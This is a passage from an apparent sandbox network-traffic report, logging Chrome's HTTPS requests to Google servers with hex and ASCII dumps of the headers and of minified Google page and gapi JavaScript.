2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700291,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 Data Ascii: 1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c Data Ascii: a\u003da.i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 74 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 65 5b 64 5d 2c 63 29 3a 5f 2e 6f 65 28 64 2c 5c Data Ascii: )[0]\|\|null));return a\|\|null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:te.hasOwnProperty(d)?a.setAttribute(te[d],c):_.oe(d,\
2024-11-10 03:55:05 UTC	1378	IN	Data Raw: 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 41 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3b 66 6f 72 28 3b 62 5c 75 30 30 33 64 61 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 61 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 7d 3b 5f 2e 42 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 32 36 5c 75 30 30 32 36 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 61 29 3a 6e 75 6c 6c 7d 3b 5f 2e 43 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f Data Ascii: n/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.Ae\u003dfunction(a){let b;for(;b\u003da.firstChild;)a.removeChild(b)};_.Be\u003dfunction(a){return a\u0026\u0026a.parentNode?a.parentNode.removeChild(a):null};_.Ce\u003dfunctio

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	142.250.185.68	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:05 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-10 03:55:05 UTC	957	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 10 Nov 2024 03:55:05 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-10 03:55:05 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-10 03:55:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	142.250.186.174	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:10 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-10 03:55:10 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 08 Nov 2024 07:44:13 GMT Expires: Sat, 08 Nov 2025 07:44:13 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 159057 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-10 03:55:10 UTC	462	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 Data Ascii: ototype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)ret
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 Data Ascii: var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.a
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 Data Ascii: =function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),rejec
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e Data Ascii: .promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=fun
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 Data Ascii: ror("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));f
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 Data Ascii: ar h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 Data Ascii: te=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();thi
2024-11-10 03:55:10 UTC	1378	IN	Data Raw: 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 Data Ascii: ype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)
